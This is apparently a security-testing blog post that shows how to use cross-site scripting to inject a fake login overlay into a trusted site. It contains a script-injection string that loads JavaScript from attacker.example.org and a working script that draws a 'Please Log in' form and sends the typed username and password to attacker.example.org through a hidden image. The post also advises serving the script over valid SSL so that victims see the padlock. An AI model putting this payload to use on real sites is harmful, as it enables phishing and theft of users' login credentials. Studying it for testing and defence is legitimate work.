Problem :
How to create an attack that uses XSS in creating overlays on the target website such that the victim users believe that they are on the intended website, but the view is in reality being controlled by the attacker. This attack exploits the victim's trust when viewing the intended website in the address bar in their browser
Solution:
To create complex attacks, it is much easier to create your scripts at a separate site (attacker.example.org) and then include them in the target site by injecting something such as the attack string shown below.
Inserting JavaScript file from another server
<script src="http://attacker.example.org/login_overlay.js"></script>
This is much easier (and less likely to make victims suspicious) than attempting to fit a one-page JavaScript exploit into one HTTP parameter. Create the script shown and make it accessible at http://attacker.example.org/login_overlay.js (or whatever your attack site's URL is).
JavaScript for creating overlay
var LoginBox;
function showLoginBox() {
var oBody = document.getElementsByTagName("body").item(0);
LoginBox = document.createElement("div");
LoginBox.setAttribute('id', 'login_box');
LoginBox.style.width = 400;
LoginBox.style.height = 200;
LoginBox.style.border='red solid 10px';
LoginBox.style.top = 0;
LoginBox.style.left = 0;
LoginBox.style.position = "absolute";
LoginBox.style.zindex = "100";
LoginBox.style.backgroundColor = "#FFFFFF";
LoginBox.style.display = "block";
LoginBox.innerHTML =
'<div><p>Please Log in</p>' +
'<form action="#">' +
'Username:<input name="username" type="text"/><br/>' +
'Password:<input name="password" type="password"/><br/>' +
'<input type="button" onclick="submit_form(this)" value="Login"/>' +
'</form>' +
'</div>';
oBody.appendChild(LoginBox);
}
function submit_form(f) {
LoginBox.innerHTML=
'<img src="http://attacker.example.org/credentials_log?username=' +
encodeURI(f.form.elements['username'].value) + '&password=' +
encodeURI(f.form.elements['password'].value) + '" width="0" height="0"/>';
LoginBox.style.display = "none";
}
showLoginBox();
Discussion
The file login_overlay.js can be as complex as needed. The second example is one of the building blocks for creating a convincing exploit. To actually carry out the exploit, a lot of additional JavaScript code would be required to perform other operations such as resizing and positioning the overlay depending on the browser's window size.
The JavaScript code in Example 2 will display a login box when the user first clicks on a link provided by the attacker. The login box created by this particular script may not be very convincing, but adjusting the fonts, colors, and other details to make it match the style of the target web application would make it convincing. The attacker's goal is to convince the user that she is looking at a real login page. The fact that the user sees the expected site in her address bar works in the attacker's favor. If the user enters her credentials into the login box, they are sent to attacker.example.org.
Protecting JavaScript with SSL
If the site is SSL-protected, then the JavaScript file should be hosted on a server that has a valid SSL certificate signed by a certificate authority trusted by the victim's browser. Otherwise, the victim's browser will warn him about the page containing some content served over HTTPS and some over plain HTTP. If the file is hosted on a server with a valid SSL certificate, then the victim's browser will show the typical padlock icon, further convincing the average user that he is safe and on the intended site.
Vinay Jagtap
A hard core Technocrat with over a decade of extensive experience in heading complex test projects coupled with real time experience of project management and thought leadership. Extensive experience in Performance, Security and Automation Testing and development of automation frameworks and ability to setup and execute Global service centers and Center of Excellences for testing.
